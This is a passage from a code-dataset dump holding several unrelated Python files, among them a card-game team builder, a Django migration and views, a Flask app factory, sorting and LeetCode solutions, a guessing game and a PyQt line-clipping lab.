for index in range(6, 12)]\n print(tempSides)\n tempPointsStr = row[1].split('/')\n points = list(map(int, tempPointsStr))\n tempChar = Character(row[3], points[0], True if row[4] == \"TRUE\" else False, int(row[5]))\n tempChar.setSides(tempSides)\n if(affil == row[2]):\n characterList.append(tempChar)\n if (2 == len(points)):\n tempChar = Character('e' + row[3], points[1], True if row[4] == \"TRUE\" else False, int(row[5]))\n tempChar.setSides(tempSides)\n characterList.append(tempChar)\n return characterList\n\ndef getSWDESTINYDBCharacters(allCards, affil):\n characterList = []\n for card in allCards:\n if((card['type_name'] == 'Character') and (card['affiliation_code'] == affil)):\n pointsStr = card['points'].split('/')\n points = list(map(int, pointsStr))\n curChar = Character(card['name'], points[0], card['is_unique'], int(card['health']))\n curChar.setSides(card['sides'])\n characterList.append(curChar)\n if(2 == len(points)):\n curChar = Character('e' + card['name'], points[1], card['is_unique'], int(card['health']))\n curChar.setSides(card['sides'])\n characterList.append(curChar)\n return characterList\n\ndef buildCombinationsHash(characterList):\n minPoints = getMinCharacterPoints(characterList)\n print(\"min points = \" + str(minPoints))\n bar = progressbar.ProgressBar(max_value = len(characterList))\n i = 0\n teamList = set()\n for firstCharacter in characterList:\n i += 1\n bar.update(i)\n for secondCharacter in characterList:\n for thirdCharacter in characterList:\n for fourthCharacter in characterList:\n curTeam = Team(firstCharacter)\n remainingPoints = curTeam.addCharacter(secondCharacter)\n if(remainingPoints >= minPoints):\n curTeam.addCharacter(thirdCharacter)\n if(remainingPoints >= minPoints):\n curTeam.addCharacter(fourthCharacter)\n teamList.add(curTeam)\n return teamList\n\ndef buildCombinations(characterList):\n minPoints = getMinCharacterPoints(characterList)\n print(\"min points = \" + str(minPoints))\n bar = progressbar.ProgressBar(max_value = len(characterList))\n i = 0\n 
for firstCharacter in characterList:\n i += 1\n bar.update(i)\n for secondCharacter in characterList:\n for thirdCharacter in characterList:\n for fourthCharacter in characterList:\n curTeam = Team(firstCharacter)\n remainingPoints = curTeam.addCharacter(secondCharacter)\n curTeam.addCharacter(thirdCharacter)\n curTeam.addCharacter(fourthCharacter)\n inListAlready = any([curTeam.getNames() == existingTeam.getNames() for existingTeam in teamList])\n if(not inListAlready):\n teamList.append(curTeam)\n return teamList\n\ndef createCsv(fileName):\n with open(fileName, 'w+', newline = '') as csvFile:\n swdWriter = csv.writer(csvFile)\n swdWriter.writerow(['Characters', 'Team Points', 'Team Health',\n 'Team Num Damage Sides', 'Team Total Damage Value',\n 'Team Num Ranged Damage Sides', 'Team Total Ranged Damage Value',\n 'Team Num Melee Damage Sides', 'Team Total Melee Damage Value',\n 'Team Num Focus Sides', 'Team Total Focus Value', 'Team Num Disrupt Sides',\n 'Team Total Disrupt Value', 'Team Num Discard Sides', 'Team Total Discard Value'])\n for team in teamList:\n swdWriter.writerow([str(team.getNames()), str(team.getPoints()), str(team.getHealth()),\n str(team.getOverallDamageInfo()['totalNumDamageSides']), str(team.getOverallDamageInfo()['totalDamageValue']),\n str(team.getOverallDamageInfo()['totalNumRangedDamageSides']), str(team.getOverallDamageInfo()['totalRangedDamageValue']),\n str(team.getOverallDamageInfo()['totalNumMeleeDamageSides']), str(team.getOverallDamageInfo()['totalMeleeDamageValue']),\n str(team.getFocusInfo()[0]), str(team.getFocusInfo()[1]), str(team.getDisruptInfo()[0]),\n str(team.getDisruptInfo()[1]), str(team.getDiscardInfo()[0]), str(team.getDiscardInfo()[1])])\n #if(team.getHealth() >= 30):\n #print(\"Final team is: \" + str(team.getNames()) + \" with \" + str(team.getPoints()) +\n # \" points, \" + str(team.getDamageInfo()) + \" damage sides and \" + str(team.getHealth()) + \" health.\")\n\n\nswdBaseURL = \"https://swdestinydb.com\"\nr = requests.get(swdBaseURL + \"/api/public/cards/?_format=json\", verify=False)\nallCards = r.json()\n\nteamList = []\n\nAFFILITATION = 'hero'\n\noneAffiliationCharacterList = getSWDESTINYDBCharacters(allCards, AFFILITATION)\n\noneAffiliationCharacterList = addProtoCharacters('protoChars.csv', oneAffiliationCharacterList, AFFILITATION)\n\nprint(\"Number of \" + AFFILITATION + \" characters is: \" + str(len(oneAffiliationCharacterList)))\n\nteamList = buildCombinationsHash(oneAffiliationCharacterList)\n\ncreateCsv('swdOutputHero.csv')\n\nteamList = []\n\nAFFILITATION = 'villain'\n\noneAffiliationCharacterList = getSWDESTINYDBCharacters(allCards, AFFILITATION)\n\noneAffiliationCharacterList = addProtoCharacters('protoChars.csv', oneAffiliationCharacterList, AFFILITATION)\n\nprint(\"Number of \" + AFFILITATION + \" characters is: \" + str(len(oneAffiliationCharacterList)))\n\nteamList = buildCombinationsHash(oneAffiliationCharacterList)\n\ncreateCsv('swdOutputVillian.csv')\n\n\"\"\"\nlabels = [str(team.getNames()) for team in teamList]\nx = [team.getHealth() for team in teamList]\ny = [team.getTotalNumDamageSides() for team in teamList]\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nscatter = ax.scatter(x, y)\ntooltip = mpld3.plugins.PointLabelTooltip(scatter, labels=labels)\nax.set_xlabel('Total Team Health')\nax.set_ylabel('Total Number of damage sides')\nmpld3.plugins.connect(fig, 
tooltip)\n\nmpld3.show()\n#fig.show()\n\"\"\"\n","sub_path":"swdImport.py","file_name":"swdImport.py","file_ext":"py","file_size_in_byte":6898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607606027","text":"import prepareData\nimport predict\nimport datetime\n\ndef predict_vm(ecs_lines, input_lines):\n # Do your work from here#\n n = 9\n result = []\n if ecs_lines is None:\n print ('ecs information is none')\n return result\n if input_lines is None:\n print ('input file information is none')\n return result\n\n trainData = prepareData.Data(ecs_lines, n)\n\n inputData = prepareData.InputMessage(input_lines)\n\n start = inputData.startTime.split('-')\n end = inputData.endTime.split('-')\n start = datetime.datetime(int(start[0]), int(start[1]), int(start[2]))\n end = datetime.datetime(int(end[0]), int(end[1]), int(end[2]))\n m = (end - start).days\n loop_max = 10000\n preResult = {}\n W = {}\n for elem in inputData.flavor:\n train = predict.Train(trainData.divData, trainData.divLabel, n, elem)\n preResult[elem] = trainData.data[elem][-n:]\n for i in range(loop_max):\n train.forwardPropagation(train.x)\n train.backwardPropagation()\n # if i % 100 == 0:\n # print(elem + ':' , train.loss)\n W[elem] = train.W\n t = 0\n for p in range(m):\n preResult[elem].append(round(train.dotProduct(preResult[elem][t: t + n - 1], W[elem])))\n t = t + 1\n preResult[elem] = preResult[elem][-m:]\n\n totalSum = 0\n for elem in preResult:\n totalSum += sum(preResult[elem])\n result.append(str(totalSum))\n\n for elem in preResult:\n preResult[elem] = sum(preResult[elem])\n result.append(elem + ' ' + str(preResult[elem]))\n result.append('')\n # result.append('predict end')\n\n pack = predict.Packing(preResult, inputData)\n\n pack.packing()\n\n packNum = len(pack.boxes)\n result.append(str(packNum))\n\n temp = [0] * pack.flavorsNum\n for i in range(packNum):\n for elem in pack.boxes[i][0]:\n temp[elem[0]-1] += 1\n result.append(str(i+1) + ' ')\n for j in range(len(temp)):\n if temp[j] != 0:\n result[-1] = result[-1] + 'flavor' + str(j+1) + ' ' + str(temp[j]) + ' '\n\n # print(ecs_lines)\n # for item in ecs_lines:\n # values = item.split(\"\\t\")\n # uuid = values[0]\n # flavorName = values[1]\n # createTime = values[2]\n\n # for index, item in input_lines:\n # print (\"index of input data\")\n\n return result\n\n","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"218075707","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('beneficiary', '0005_remove_beneficiary_group'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='beneficiary',\n name='group',\n field=models.ForeignKey(related_name='beneficiaries', blank=True, to='beneficiary.BeneficiaryGroup', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"webapp/beneficiary/migrations/0006_beneficiary_group.py","file_name":"0006_beneficiary_group.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305281624","text":"class Solution(object):\n def dailyTemperatures(self, temperatures):\n \"\"\"\n :type temperatures: List[int]\n :rtype: List[int]\n \"\"\"\n length = len(temperatures)\n if length == 1:\n return [0]\n i = 1\n 
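# monotonic-stack approach: an index is popped once a warmer day arrives\n 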
result = []\n j = 0\n while j < length:\n result.append(0)\n j += 1\n stack = [0]\n while i < length:\n j = len(stack) - 1\n if temperatures[i] <= temperatures[stack[j]]:\n stack.append(i)\n else:\n while j >= 0:\n if temperatures[stack[j]] < temperatures[i]:\n top = stack.pop()\n result[top] = i - top\n j -= 1\n else:\n break;\n stack.append(i)\n i += 1\n return result","sub_path":"dataStructure/Stack/DaliyTempratures.py","file_name":"DaliyTempratures.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"281509935","text":"def heapify(arr, heap_size, index):\n \"\"\"To heapify subtree rooted at index i.\n n is size of heap\n\n :param arr:\n :param heap_size:\n :param index:\n :return:\n \"\"\"\n largest = index # Initialize largest as root\n left_child = 2 * index + 1 # left = 2*i + 1\n right_child = 2 * index + 2 # right = 2*i + 2\n\n # See if left child of root exists and is\n # greater than root\n if left_child < heap_size and arr[index] < arr[left_child]:\n largest = left_child\n\n # See if right child of root exists and is\n # greater than root\n if right_child < heap_size and arr[largest] < arr[right_child]:\n largest = right_child\n\n # Change root, if needed\n if largest != index:\n arr[index], arr[largest] = arr[largest], arr[index] # swap\n # Heapify the root.\n heapify(arr, heap_size, largest)\n\n\n# The main function to sort an array of given size\ndef heap_sort(arr):\n size = len(arr)\n # Build a maxheap.\n # Since last parent will be at ((n//2)-1) we can start at that location.\n for i in range(size // 2 - 1, -1, -1):\n heapify(arr, size, i)\n print(arr)\n\n # One by one extract elements\n for i in range(size - 1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i] # swap\n heapify(arr, i, 0)\n\n\n# Driver code to test above\narr = [12, 11, 13, 5, 6, 7]\nheap_sort(arr)\nn = len(arr)\nprint(\"Sorted array is\")\nprint(arr)","sub_path":"Week_02/heap_sort_recursive.py","file_name":"heap_sort_recursive.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"136977989","text":"from flask import Flask\nfrom flask_bcrypt import Bcrypt\nfrom flask_migrate import Migrate\nfrom flask_s3 import FlaskS3\nfrom flask_sessions import Sessions\n\nfrom web.db import db\nfrom web.exceptions import AppExceptionHandlers\n\nfrom .admin_views import (add_admin_views, admin,\n set_skill_model_view_icon_choices)\nfrom .utils.view import CustomJSONEncoder\n\nsessions = Sessions()\ns3 = FlaskS3()\n\n\ndef create_base_app(settings):\n validate_settings(settings)\n app = Flask(__name__)\n\n app.config.update(settings)\n app.secret_key = app.config['SECRET_KEY']\n app.json_encoder = CustomJSONEncoder\n\n db.init_app(app)\n app.db = db\n Migrate(app, app.db)\n\n Bcrypt(app)\n sessions.init_app(app)\n s3.init_app(app)\n\n admin.init_app(app)\n set_skill_model_view_icon_choices(app.static_folder)\n add_admin_views()\n\n register_blueprints(app)\n AppExceptionHandlers.register_all(app)\n\n return app\n\n\ndef validate_settings(settings):\n required_configs = [\n 'SECRET_KEY', 'SQLALCHEMY_DATABASE_URI', 'NOTIFIER_API_KEY'\n ]\n for config_key in required_configs:\n if settings.get(config_key) is None:\n raise Exception('Missing required configuration: {}'.format(config_key))\n\n\ndef get_app():\n from flask import current_app as app\n if not app:\n from . 
import config\n app = create_base_app(config.SETTINGS)\n return app\n\n\ndef register_blueprints(app):\n from .blueprints.index import index\n from .blueprints.favicon import favicon\n from .blueprints.account import account\n from .blueprints.contact_me import contact_me\n from .blueprints.message import message\n app.register_blueprint(index)\n app.register_blueprint(favicon)\n app.register_blueprint(account, url_prefix='/account')\n app.register_blueprint(contact_me)\n app.register_blueprint(message)\n","sub_path":"web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"305545322","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import Http404\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import logout\nfrom django.contrib.auth import login\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import loader\n\n#from rolepermissions.roles import assign_role\n\nfrom unti.models import Order\nfrom unti.models import OrderType\nfrom unti.models import Action\n\nfrom unti.forms import FormSearch\nfrom unti.forms import FormNewOrder\nfrom unti.forms import FormNewAction\nfrom unti.forms import FormLogin\nfrom unti.forms import FormRegister\nfrom unti.views_login_reg import *\nfrom unti.views_orders_management import *\nfrom unti.views_new_orders import *\nfrom unti.models import Attachment\nfrom unti.models import Company\nfrom unti.models import log\nfrom unti.models import LogLine\n\ndef react(request):\n return render(request, \"index.html\", {})\n\n@login_required\ndef index(request):\n current_user = request.user\n log(current_user.last_name, \"index\")\n all_orders = Order.objects.all()\n my_orders = []\n for _order in all_orders:\n if _order.current_user_id == current_user.id or _order.user_id == current_user.id:\n my_orders.append({\"order\":_order,\"doc_path\":doc_path_f(_order)})\n\n order_types = OrderType.objects.all()\n current_user = request.user\n allowed_order_types = []\n for i in order_types:\n allowed = False\n if i.requires_permission == \"\":\n allowed = True\n else:\n for my_per in [perm[1] for perm in current_user.groups.values_list()]:\n if my_per == i.requires_permission:\n allowed = True\n if allowed:\n allowed_order_types.append(i)\n\n if request.method == \"POST\":\n form = FormSearch(request.POST)\n data = form.data\n log(current_user.last_name, \"index SEARCH \" + data['search'])\n if form.is_valid():\n s = data['search']\n filtered = []\n for _order in my_orders:\n yes = False\n if (s.lower() in _order[\"order\"].company.company_bin.lower()) or \\\n (s.lower() in _order[\"order\"].company.company_name.lower()) or \\\n (s.lower() in str(_order[\"order\"]).lower()) or \\\n (s == str(_order[\"order\"].id)) or \\\n (s.lower() in _order[\"order\"].current_user_name.lower()) or\\\n (s.lower() in _order[\"order\"].user_name.lower()) or\\\n (s.lower() in _order[\"order\"].company.company_email):\n yes = True\n for j in _order[\"order\"].action_set.all():\n if not (j.fields is None):\n if s.lower() in j.fields.lower():\n yes = True\n if not (j.action is None):\n if s.lower() in j.action.lower():\n yes = True\n for _file in Attachment.objects.all():\n if (s.lower() in _file.file_name.lower()) and 
(_file.parent_id == str(j.id)):\n yes = True\n if yes:\n filtered.append(_order)\n context = {'all_orders': filtered, 'searched': s, }\n return render(request, \"oms-form-orders-list.html\", context, {'form': form})\n form = FormSearch()\n context = {'all_orders': my_orders[0:10], 'user': current_user, \"companies\":Company.objects.all(),\n \"order_types\":allowed_order_types}\n return render(request, \"oms-form-orders-list.html\", context, {'form': form})\n\n\n@login_required\ndef companies(request):\n current_user = request.user\n log(current_user.last_name, \"companies list\")\n all_orders = Order.objects.all()\n my_orders = []\n filtered = []\n\n for i in all_orders:\n if i.current_user_id == current_user.id or i.user_id == current_user.id:\n my_orders.append(i)\n if request.method == \"POST\":\n form = FormSearch(request.POST)\n data = form.data\n log(current_user.last_name, \"companies list SEARCH \" + data[\"search\"])\n if form.is_valid():\n s = data['search']\n filtered = []\n for i in Company.objects.all().order_by('-id'):\n if (s.lower() in i.company_bin.lower()) or (s.lower() in i.company_name.lower()) or (s == str(i.id)) \\\n or (s.lower() in i.company_email):\n filtered.append(i)\n context = {'all_companies': filtered, 'searched': s, }\n return render(request, \"oms-form-companies-list.html\", context, {'form': form})\n form = FormSearch()\n context = {'all_companies': Company.objects.all().order_by('-id')[:10], 'user': current_user,\n 'toos': GeneralDirectory.objects.filter(directory=\"opf\"),\n 'statuses': GeneralDirectory.objects.filter(directory=\"status\"),\n 'regions': GeneralDirectory.objects.filter(directory=\"region\"),\n }\n return render(request, \"oms-form-companies-list.html\", context, {'form': form})\n\n@login_required\n@csrf_exempt\ndef newcompany(request):\n current_user = request.user\n form = FormNewCompany()\n if request.method == \"POST\":\n form = FormNewCompany(request.POST)\n data = form.data\n log(current_user.last_name, \"New company \" + data['company_name'])\n if form.is_valid() or True:\n cmp = Company()\n cmp.company_name = data['company_name']\n cmp.company_bin = data['company_bin']\n cmp.company_inn = data['company_inn']\n cmp.company_email = data['company_email']\n cmp.too_id = int(data['opf'])\n cmp.status_id = int(data['status'])\n cmp.region_id = int(data['region'])\n cmp.address = data['address']\n cmp.contact_person = data['contact_person']\n cmp.contact_details = data['contact_details']\n cmp.user_name = current_user.first_name + \" \" + current_user.last_name\n cmp.user_id = current_user.id\n cmp.save()\n return HttpResponseRedirect(\"/orders/company\"+str(cmp.id))\n else:\n print(form.errors)\n context = {'user': current_user, 'toos': GeneralDirectory.objects.filter(directory=\"opf\"),\n 'statuses': GeneralDirectory.objects.filter(directory=\"status\"),\n 'regions': GeneralDirectory.objects.filter(directory=\"region\"),\n 'errors': form.errors}\n #return render(request, \"oms-form-newcompany.html\", context, {'form': form})\n return HttpResponseRedirect(\"/\")\n\n\ndef log_view(request):\n context = {'logs': LogLine.objects.all()}\n return render(request, \"log_view.html\", context)","sub_path":"unti/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"388349868","text":"from art import logo, vs\r\nfrom game_data import data\r\nimport random\r\nimport os\r\n\r\ndef format_data(account):\r\n account_name = 
account[\"name\"]\r\n account_descr = account[\"description\"]\r\n account_country = account[\"country\"]\r\n return f\"{account_name}, a {account_descr}, from {account_country}\"\r\n\r\ndef check_answer(guess, a_followers, b_followers):\r\n if a_followers > b_followers:\r\n return guess == \"a\"\r\n else:\r\n return guess == \"b\"\r\n\r\nprint(logo)\r\nscore = 0\r\ngame_should_continue = True\r\naccount_b = random.choice(data)\r\n\r\nwhile game_should_continue:\r\n\r\n#Generating a randoom account from the game data\r\n account_a = account_b\r\n account_b = random.choice(data)\r\n if account_a == account_b:\r\n account_b = random.choice(data)\r\n\r\n print(f\"Compare A: {format_data(account_a)}.\")\r\n print(vs)\r\n print(f\"Against B: {format_data(account_b)}.\")\r\n\r\n\r\n #Ask user for a guess\r\n guess = input(\"Who has more followers? Give your choice 'A' or 'B': \").lower()\r\n\r\n ##Get follower count of each account\r\n\r\n a_follower_count = account_a[\"follower_count\"]\r\n b_follower_count = account_b[\"follower_count\"]\r\n is_correct = check_answer(guess, a_follower_count, b_follower_count)\r\n\r\n os.system('cls') #Clear the screen between rounds\r\n\r\n #Giver user feedback on their guess\r\n if is_correct:\r\n score += 1\r\n print(f\"You are right! Current score is: {score}.\")\r\n else:\r\n game_should_continue = False\r\n print(f\"Sorry, Better luck next time! Final score is: {score}.\")\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"432209468","text":"from django.conf.urls import url\n\nfrom classification.api.alike import (\n all_confirmed_alike,\n all_voted_alike_user,\n vote_alike,\n\n all_confirmed_alike_staff,\n alike_admin,\n\n all_unconfirmed_suggested_alike,\n)\n\n\nurlpatterns = [\n url(r'^voted_all/(?P[A-Z0-9]{5})/$',\n all_voted_alike_user),\n url(r'^vote/(?P[A-Z0-9]{5})/(?P[A-Z0-9]{5})/$',\n vote_alike),\n url(r'^confirmed/(?P[A-Z0-9]{5})/$',\n all_confirmed_alike),\n\n\n # ADMIN\n url(r'^admin/confirmed/staff/(?P\\d+)/$',\n all_confirmed_alike_staff),\n url(r'^admin/(?P\\d+)/(?P\\d+)/$',\n alike_admin),\n url(r'^admin/suggested/unconfirmed/all/$',\n all_unconfirmed_suggested_alike),\n]\n","sub_path":"eshop-index-back/classification/urls/alike.py","file_name":"alike.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"378489717","text":"from PyQt5 import QtWidgets, uic\nfrom PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\nfrom PyQt5.QtGui import QPen, QColor, QImage, QPixmap, QPainter, QTransform\nfrom PyQt5.QtCore import Qt, QTime, QCoreApplication, QEventLoop, QPoint\nimport time\nimport math as m\n\nred = Qt.darkGreen\nblue = Qt.red\nnow = None\n\nclass Window(QtWidgets.QMainWindow):\n def __init__(self):\n QtWidgets.QWidget.__init__(self)\n uic.loadUi(\"window.ui\", self)\n self.scene = Scene(0, 0, 561, 581)\n self.scene.win = self\n self.view.setScene(self.scene)\n self.image = QImage(561, 581, QImage.Format_ARGB32_Premultiplied)\n self.image.fill(Qt.white)\n self.bars.clicked.connect(lambda : set_bars(self))\n self.erase.clicked.connect(lambda: clean_all(self))\n self.paint.clicked.connect(lambda: clipping(self))\n self.rect.clicked.connect(lambda: set_rect(self))\n self.ect.clicked.connect(lambda: add_bars(self))\n self.lines = []\n self.clip = None\n self.point_now = None\n self.input_bars = 
False\n self.input_rect = False\n self.pen = QPen(red)\n\n\nclass Scene(QtWidgets.QGraphicsScene):\n\n def mousePressEvent(self, event):\n add_point(event.scenePos())\n\n def mouseMoveEvent(self, event):\n global now, w\n if w.input_rect:\n if now is None:\n now = event.scenePos()\n else:\n self.removeItem(self.itemAt(now, QTransform()))\n p = event.scenePos()\n self.addRect(now.x(), now.y(), abs(now.x() - p.x()), abs(now.y() - p.y()), QPen(Qt.blue))\n\n\n\ndef set_bars(win):\n if win.input_bars:\n win.input_bars = False\n win.rect.setDisabled(False)\n win.erase.setDisabled(False)\n win.paint.setDisabled(False)\n win.ect.setDisabled(False)\n else:\n win.input_bars = True\n win.rect.setDisabled(True)\n win.erase.setDisabled(True)\n win.paint.setDisabled(True)\n win.ect.setDisabled(True)\n\n\ndef set_rect(win):\n if win.input_rect:\n win.input_rect = False\n win.bars.setDisabled(False)\n win.erase.setDisabled(False)\n win.paint.setDisabled(False)\n win.ect.setDisabled(False)\n else:\n win.input_rect = True\n win.bars.setDisabled(True)\n win.erase.setDisabled(True)\n win.paint.setDisabled(True)\n win.ect.setDisabled(True)\n\n\ndef add_row(win):\n win.table.insertRow(win.table.rowCount())\n\n\ndef add_point(point):\n global w\n if w.input_bars:\n if w.point_now is None:\n w.point_now = point\n else:\n w.lines.append([[w.point_now.x(), w.point_now.y()],\n [point.x(), point.y()]])\n\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(w.point_now.x(), w.point_now.y()))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(point.x(), point.y()))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n w.scene.addLine(w.point_now.x(), w.point_now.y(), point.x(), point.y(), w.pen)\n w.point_now = None\n\n\ndef clean_all(win):\n win.scene.clear()\n win.table.clear()\n win.lines = []\n win.image.fill(Qt.white)\n r = win.table.rowCount()\n for i in range(r, -1, -1):\n win.table.removeRow(i)\n\n\ndef add_bars(win):\n global now\n if now is None:\n QMessageBox.warning(win, \"Ошибка\", \"Не введен отсекатель!\")\n return\n buf = win.scene.itemAt(now, QTransform())\n if buf is None:\n QMessageBox.warning(win, \"Ошибка\", \"Не введен отсекатель!\")\n else:\n buf = buf.rect()\n win.clip = [buf.left(), buf.right(), buf.top(), buf.bottom()]\n\n t = abs(win.clip[2] - win.clip[3]) * 0.8\n k = abs(win.clip[0] - win.clip[1]) * 0.8\n # задаем граничные отрезки\n win.pen.setColor(red)\n w.lines.append([[win.clip[0], win.clip[2] + t], [win.clip[0], win.clip[3] - t]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0], win.clip[2] + t))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0], win.clip[3] - t))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[0], win.clip[2] + t, win.clip[0], win.clip[3] - t, win.pen)\n\n w.lines.append([[win.clip[1], win.clip[2] + t], [win.clip[1], win.clip[3] - t]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1], win.clip[2] + t))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1], win.clip[3] - t))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[1], win.clip[3] - t, win.clip[1], win.clip[2] + t, win.pen)\n\n w.lines.append([[win.clip[0] + k, win.clip[2]], [win.clip[1] - k, win.clip[2]]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0] + k, win.clip[2]))\n item_e = 
QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1] - k, win.clip[2]))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[0] + k, win.clip[2], win.clip[1] - k, win.clip[2], win.pen)\n\n w.lines.append([[win.clip[0] + k, win.clip[3]], [win.clip[1] - k, win.clip[3]]])\n add_row(w)\n i = w.table.rowCount() - 1\n item_b = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[0] + k, win.clip[3]))\n item_e = QTableWidgetItem(\"[{0}, {1}]\".format(win.clip[1] - k, win.clip[3]))\n w.table.setItem(i, 0, item_b)\n w.table.setItem(i, 1, item_e)\n win.scene.addLine(win.clip[0] + k, win.clip[3], win.clip[1] - k, win.clip[3], win.pen)\n\ndef clipping(win):\n buf = win.scene.itemAt(now, QTransform()).rect()\n win.clip = [buf.left(), buf.right(), buf.top(), buf.bottom()]\n for b in win.lines:\n pass\n win.pen.setColor(blue)\n modPoint(b, win.clip, win)\n win.pen.setColor(red)\n\ndef getCode(a, rect):\n code = [0, 0, 0, 0]\n if a[0] < rect[0]:\n code[0] = 1\n if a[0] > rect[1]:\n code[1] = 1\n if a[1] < rect[2]:\n code[2] = 1\n if a[1] > rect[3]:\n code[3] = 1\n\n return code\n\ndef codeSum(CODE):\n Sum = 0\n for i in range(0, 4):\n Sum += CODE[i]\n return Sum\n\ndef codesMult(code1, code2):\n Comp = 0\n for i in range(0, 4):\n Comp += int((code1[i] + code2[i])/2)\n return Comp\n\ndef cutDouble(R, i, epsilon, rect) :\n global point1\n global point2\n global Pcp\n global Pm\n global code1\n global code2\n \n while True:\n if((abs(point1[0] - point2[0]) < epsilon) and (abs(point1[1] - point2[1]) < epsilon)):\n return \n\n xcp = round((point1[0] + point2[0]) / 2)\n ycp = round((point1[1] + point2[1]) / 2) \n Pcp = [xcp, ycp] \n \n Pm = point1 \n point1 = Pcp\n\n code1 = getCode(point1, rect)\n Comp = codesMult(code1, code2) \n \n if(Comp == 0):\n continue\n\n point1 = Pm\n point2 = Pcp\n continue\n\ndef modPoint(bar, rect, win):\n global point1\n global point2\n\n global Pcp\n global Pm\n global code1\n global code2\n\n i = 1\n\n Pcp = 0\n Pm = 0\n\n epsilon = m.sqrt(2)\n\n point1 = bar[0]\n point2 = bar[1]\n\n while True:\n\n code1 = getCode(point1, rect)\n code2 = getCode(point2, rect)\n\n S1 = codeSum(code1)\n S2 = codeSum(code2)\n\n if(S1 == S2 == 0):\n win.scene.addLine(point1[0], point1[1], point2[0], point2[1], win.pen)\n return\n\n if(codesMult(code1, code2) != 0):\n return\n\n R = point1\n\n if(i > 2):\n if(codesMult(code1, code2) == 0):\n win.scene.addLine(point1[0], point1[1], point2[0], point2[1], win.pen)\n return\n\n if(S2 == 0):\n point1 = point2\n point2 = R\n i += 1 \n continue \n\n\n cutDouble(R, i, epsilon, rect)\n\n #point1 = point1\n point2 = R\n i += 1\n continue\n\n\n\n\n print(S1, S2)\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n w = Window()\n w.show()\n sys.exit(app.exec_())\n","sub_path":"lab07/lab7_1.py","file_name":"lab7_1.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"183897635","text":"\"\"\"\nGroup Anagrams\nhttps://leetcode.com/explore/interview/card/top-interview-questions-medium/103/array-and-strings/778/\n\n_author: Kashif Memon\n_python_version: 3.7.2\n\"\"\"\n\n\nclass Solution:\n def groupAnagrams(self, strs: 'List[str]') -> 'List[List[str]]':\n out = {}\n for item in strs:\n s_item = \"\".join(sorted(item))\n if s_item in out:\n out[s_item].append(item)\n else:\n out[s_item] = [item]\n return out.values()\n\n # Time Limit Exceeded\n # out = []\n # s_strs = []\n # for item in strs:\n # 
